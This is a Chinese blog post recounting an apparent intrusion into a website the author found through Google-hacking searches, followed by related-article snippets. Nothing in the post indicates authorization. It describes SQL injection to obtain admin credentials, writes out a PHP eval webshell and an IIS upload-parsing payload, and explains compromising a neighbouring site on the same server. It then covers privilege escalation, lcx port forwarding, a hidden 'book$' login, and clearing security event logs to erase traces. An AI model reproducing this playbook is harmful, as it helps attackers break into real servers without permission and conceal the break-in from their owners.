一次渗透测试

最新推荐文章于 2024-07-22 12:01:57 发布
最新推荐文章于 2024-07-22 12:01:57 发布
阅读量2k 收藏 6
点赞数 2
文章标签: 测试 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hungchuiho/article/details/90210811
版权

一、前言:经过多个月的学习,我觉得是时候需要一次实战来验证这几个月的学习效果了,而且伟人常说 实践出真理,实践还可以遇到很多平时没有遇到的实际问题。

二、网站测试过程:
1、网站的选择: 对于这次测试的网站的选择我是使用googlehack语法来搜索的,对于如何使用Googlehack语法我就不说了,网上有使用教程,运气很好不用多久我找到了一个可以对其进行测试的网站。
2、网站进行信息收集:
Whois信息–注册人、电话、邮箱、DNS、地址
Googlehack–敏感目录、敏感文件、后台地址
服务器IP–Nmap扫描、端口对应的服务、C段、旁站
服务器、组件(指纹)–操作系统、web server(apache,nginx,iis)、脚本语言,数据库类型等等…

首先我进行多地ping 发现并没有cdn,运气比较好,如果我们测试的网站存在cdn该怎么获取真实ip
a.通过查询历史dns记录找真实ip
b.通过查找子域名,因为cdn价格比较昂贵,大多数网站就对主站使用cdn,所以我们可以通过子域名来get到真实的ip地址
c.让该网站的服务器主机连接我们,我们可以通过注册功能,注册,注册时有些网站会给我们的邮箱发送邮件,这样我们查看邮箱的原文就可以知道网站真实ip
d.使用国外的主机去访问目标网站也可以获取ip

根据ip对端口进行收集发现开的端口不多,还有一些不知道什么服务的端口。3306、1433可以进行爆破等等。在这里插入图片描述
我们对网站进行指纹识别一下,信息如图下,emm… joomla cms 在国内并不常见啊
在这里插入图片描述
3、网站的漏洞挖掘跟验证:
这个就因为我用googlehack搜到存在注入,所以就以进行sql注入来测试网站,其他的漏洞还没去测试,所以下面我以SQL注入来测试这个网站,在我进行注入时并没有拦截我的语句,也就很顺利提供手工注入拿到管理员的账号密码,(这鬼知道我为什么没有用工具跑。。而选择手工测试)因为刚在信息收集时已经通过工具知道登陆后台的地址http://xxxx.com/master/index.php

4、拿shell:

4.1登陆后台看下怎么可以进行下一步拿shell,网站的结构非常的简单,Joomla经过二次开发了,并没有网上原版Joomla存在的漏洞了,不过发现可以进行上传图片文件的地方,上传PHP文件不可行,那上传jpg格式的有一句话马,通过burp抓包修改看看,通过各种%00截断、00截断、修改mime类型等操作都发现失败。。
在这里插入图片描述在这里插入图片描述
这时想想IIS7.5的漏洞可不可以利用,OK,马上去写了一个001.jpg的图片,内容为 <?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?> 这个内容意思是写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件,这样我们访问http://xxxx.com/xxxxxx/xxxx/001.jpg/.php 就会在图片目录下生成一句话木马 shell.php,密码为cmd,不过结果还是不可行,这个原因后面会讲到。。。

4.2现在上传已经拿不了shell了,去看看刚刚扫描到的目录文件,看到一个文件名为config/conn.php的目录,访问为空白页面,想一下这跟ASP网站的inc/config.asp目录是不是很相似在这里插入图片描述转换思维,像ASP那样通过插马访问config/conn.php目录可不可以拿shell,好,开始对网站进行插马,进行闭合等等操作在这里插入图片描述
结果又一次失败,而失败的原因应该是我没有修改网站脚本的权限。

4.3回去看后台目录,找到一个改名的PHPinfo页面1.php。
在这里插入图片描述
从这里我们得到很多信息,包括刚刚利用IIS7.5为什么没有成功,因为php.ini里cgi.fix_pathinfo=1 。不过得到物理路径,可以尝试直接注入写shell在这里插入图片描述
被拦截了,我使用变形的PHP一句话结果也是拦截。利用sqlmap交互写shell,发现不是dba,压根就没有写入权限,不拦截我也写不进去啊。。。在这里插入图片描述
做到这步,我试过很多种方法都没getshell,看来还是自己菜啊,不过也不会因此放弃,既然主站的防护做的好,那我可以通过旁站去拿。

5.旁站:
5.1 去筛选存在漏洞的旁站:在这里插入图片描述
在如此多的网站中。我找到一个存在上传漏洞的上传点,然后把马上传上去。在这里插入图片描述
6. 提权:查看大马组件发现cmd组件都没了,应该是被某些安全软件删除了,那需要自己上传cmd执行命令。把cmd上传到可读可写权限的目录下在这里插入图片描述在这里插入图片描述权限是network需进一步提升权限。执行systeminfo查看补丁数量,发现才7个,那就上传免杀的pr,利用内存溢出直接提权在这里插入图片描述
在这里插入图片描述
本来打算上传PwDump读取管理员的hash值的,结果上传上去执行不了,可能被杀掉了。输入netstat -ano查看发现80端口不是原有的地址,是个内网地址,外网把内网的80端口映射出来。那就上传lcx做内网端口转发吧,同样上传到可读可写的目录下在这里插入图片描述
lcx转发:本机上在这里插入图片描述
目标主机上
在这里插入图片描述
本机打开远程连接输127.0.0.1 13111 就可以输入新建的book$来登陆了,这样就拿下服务器了。

  1. 清理日记痕迹:需要清除计算机管理的事件查看器的安全性我们用book$登陆的记录,还有C:\windows\system32\logfiles\下的包含操作记录日记。最后最后不要有坏心思,尽量把发现的漏洞提交到漏洞平台,一起维护网络的安全 努力吧。
阿户.
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对某泛微OA的一次渗透测试_利用方式三
afei001
06-07 798
后来才知道,是可以getshell的,看了表哥们的文章才知道,泛微对于堆叠查询做了过滤,过滤了;、--+等特殊字符。原来SQLserver堆叠注入并不需要;,所以SQLmap是无法直接--os-shell的。可惜当时并不知道不需要;就把洞交了。又少了好几个W。唉。
新手小白第一次渗透测试笔记
weixin_54787877的博客
02-22 577
渗透测试指网络安全专业人员模拟黑客入侵方式对目标进行攻击,以此来评估目标的安全防御能力。一般分为:黑盒渗透测试、白盒渗透测试、灰盒渗透测试。 选择的渗透测试类型主要取决于公司和组织的用途和范围,他们是否想要模拟员工、网络管理员或外部来源的攻击。在黑盒渗透测试中,测试人员没有获得关于他将要测试的应用程序的许多信息,测试人员有责任收集有关目标网络,系统或应用程序的信息;在白盒渗透测试中,测试人员将获得有关网络,系统或应用程序的完整信息以及源代码,操作系统详细信息和其他所需信息。它可以被认为是模拟内部来源的攻击.
完成一次渗透测试项目
bloodzer0
03-04 1601
背景:小B接到一个渗透测试任务,由于很久没有从乙方视角执行渗透测试的他决定先梳理一下自己的思路。 准备工作 第一个是渗透测试用例:对于技术人员来讲这是一个比较好的知识点沉淀的方式,不但有助于你在每一次渗透测试中不遗漏掉某个点,并且还可以在团队内部进行共享方便提升团队内部成员的技能。 第二个是工具箱:工欲善其事必先利其器,有一个好的工具箱决定我们在渗透测试时的效率。一个好的工具箱应该包括,不同操作...
一次渗透测试实战
热门推荐
m0_46467017的博客
04-23 2万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
一次渗透测试实战记录
最新发布
Locosomnus的博客
07-22 671
记录一下,只是记录一下
一次渗透实战
crowsec
01-26 979
微信公众号:乌鸦安全 扫取二维码获取更多信息! 更新时间:2021.05.14 01 前提 在早些时候看到先知上有一篇关于thinkphp rce的实战文章 https://xz.aliyun.com/t/6267 于是顺着师傅的思路也来试试 从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了 02geshell之路 通过报错的方式发现了当前的版本为 ThinkPHPV5.0.23 通过师傅的思路,先去找phpinfo界面 http:/...
一次渗透测试实战
zhangge3663的博客
11-02 1394
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
【网络安全】记一次简单渗透测试实战
kali_Ma的博客
09-23 3212
整个渗透过程(尤其是提权过程)都异常的顺利,虽然通过辅助平台查询后发现有多个漏洞可以利用,但没想到msf的getsystem直接就拿下了最高权限。
渗透测试
m0_60411436的博客
11-21 786
实验一 网络扫描与网络侦察 实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 实验步骤: 1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图
某平台的一次简单渗透测试记录
HBohan的博客
11-17 2457
目标 某平台系统(www.target.net) 流程 本次渗透测试的流程图: 【技术资料】 测试 拿到站点后先做信息收集,扫描目录看看有无敏感信息 寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。 在创建目标处存在图片上传接口,上传shell试试。 没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey控制上传路径 可跨目录上传,但当前/webapp/test/uploadFile/路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放
122-记一次渗透测试后引发的小扩展.pdf
09-20
在这里,我们讨论了一次渗透测试后引发的小扩展,主要涉及到certutil和wmic命令的使用,以及如何绕过安全软件的拦截。 首先,作者使用了certutil命令来下载文件,但是发现被安全软件拦截。于是,作者尝试了不同的...
一次某单位的内网渗透测试
黑战士的博客
06-20 690
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
完成一次渗透测试项目 New Address
zero
11-17 1852
背景:小B接到一个渗透测试任务,由于很久没有从乙方视角执行渗透测试的他决定先梳理一下自己的思路。 准备工作 第一个是渗透测试用例:对于技术人员来讲这是一个比较好的知识点沉淀的方式,不但有助于你在每一次渗透测试中不遗漏掉某个点,并且还可以在团队内部进行共享方便提升团队内部成员的技能。 第二个是工具箱:工欲善其事必先利其器,有一个好的工具箱决定我们在渗透测试时的效率。一个好的工具箱应该包括,不同操作系统(Win、Linux、macOS);各种环境与基础工具(Java、Py2与Py3、Ruby、NodeJS、G
渗透测试需要学什么?费用是多少?
oldboyedu1的博客
06-16 480
老男孩IT教育是行业内知名的网络安全培训机构,其课程涵盖了web渗透测试及源码审计、等级保护、风险评估、app渗透,内网渗透,逆向工程、安全巡检、应急响应,全实操案例,可以满足你学习的需求。包括渗透测试概述、信息收集与社工技巧、渗透测试工具使用、协议渗透、web渗透、系统渗透、中间件渗透、内网渗透渗透测试报告编写、源码审计工具使用、PHP代码审计、web安全防御等。包括项目准备与启动、资产识别、脆弱性识别、安全措施识别、资产分析、脆弱性分析、综合风险分析、措施规划、报告输出、项目验收等。
一次简单的渗透测试
cs_xiaoqiang的博客
01-20 3441
由于当时做的时候忘了截图,所以就直接写步骤了。 (1)先用御剑进行后台扫描,找到管理员的登陆地址。如果有robots.txt就可以不用扫描目录了 (2)先试一试比较常见的弱口令,然后打开啊D工具,进行猜解用户名和密码。 (3)用猜解出的用户名和密码登陆。 (4)找到网站的解析,随便在一个输入框内输入一句话木马,由于不知道源码是什么样子的,       所以,可以在网上将源码下载下来,然
渗透测试过程
糖小喵
05-18 289
信息收集--->web 漏洞挖掘--->webshell--->内网 内网渗透--->域渗透--->取域控权限 信息收集 可看--->信息收集
渗透测试是什么?有哪些类型?测试费用多少钱?
Adelineyoung8的博客
01-23 649
1.第三方软件测试报告收费是依据具体内容进行评估,如只有功能性测试,则需要提供具体功能清单,根据功能数量进行评估,若还有其他技术指标,如性能效率、信息安全性等需提供完整清单评估后报价。外网渗透则模拟对内部状态一无所知的攻击者的行为(包括对网络设备的远程攻击,口令管理安全测试,防火墙规则试探和规避,web及其他开放应用服务的安全测试等),从外网对目标进行渗透测试。应用系统测试则对渗透目标提供的各种应用,如ASP、CGI、JSP、PHP等组成的WWW应用进行渗透测试渗透测试,也被称为漏洞评估或。
渗透测试之指纹识别(CMS、CDN、WAF)
hmysn的博客
05-15 5802
目录 什么是指纹识别: 1、cms指纹识别 2、cdn指纹识别: 3、WAF指纹识别: 什么是指纹识别: 通过关键特征,识别出目标的CMS系统、服务器、开发语言、操作系统、CDN、WAF的类别 版本等等。 其中主要识别以下的信息: 1、CMS信息:比如Discuz、织梦、帝国CMS、PHPCMS、ECshop等; 2、前端技术:比如HTML5、jquery、bootstrap、Vue、ace等; 3、开发语言:比如PHP、Java、Ruby、Python、C#等; 4、Web服务器:比
如何成功实现一次渗透测试
04-15
如果你想在网络中执行渗透测试,你需要首先确定你的目标是什么。一旦你找到了目标系统,你可能需要使用漏洞扫描工具来寻找系统中已知的漏洞。如果你找到了漏洞,你可以通过利用漏洞来获取对系统的访问权限。在实际的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值